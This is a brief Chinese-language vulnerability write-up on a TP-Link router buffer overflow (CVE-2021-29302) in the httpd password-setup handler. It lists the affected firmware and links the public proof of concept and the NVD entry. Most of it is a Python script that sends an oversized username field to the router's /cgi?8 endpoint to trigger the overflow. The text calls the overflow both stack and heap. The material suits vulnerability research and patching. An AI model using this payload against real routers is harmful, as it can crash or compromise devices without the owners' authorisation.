TP-link 栈溢出漏洞（CVE-2021-29302）

# TP-link 栈溢出漏洞（CVE-2021-29302）

httpd进程解析HTTP正文消息时会出现缓冲区溢出，这可能导致远程代码执行。例如，当我们第一次设置路由器密码时，http守护进程不会验证外部http消息。如果传输的用户名或密码太长，会导致httpd进程堆空间溢出。

影响版本：

V4_200 <= 2020.06 PoC已公开：https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302 ```py import requests headers = { "Host": "192.168.0.1", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "text/plain", "Content-Length": "78", "Origin": "http://192.168.0.1", "Connection": "close", "Referer": "http://192.168.0.1/" } payload = "a" * 512 + "b" * 1024 formdata = "[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\nname={}\r\noldPwd=admin\r\npwd=lys123\r\n".format(payload) proxies = { "http": "http://127.0.0.1:8080", } url = "http://192.168.0.1/cgi?8" response = requests.post(url, data=formdata, headers=headers, proxies=proxies) print response.text ``` ref： * https://github.com/liyansong2018/CVE/tree/main/2021/CVE-2021-29302 * https://nvd.nist.gov/vuln/detail/CVE-2021-29302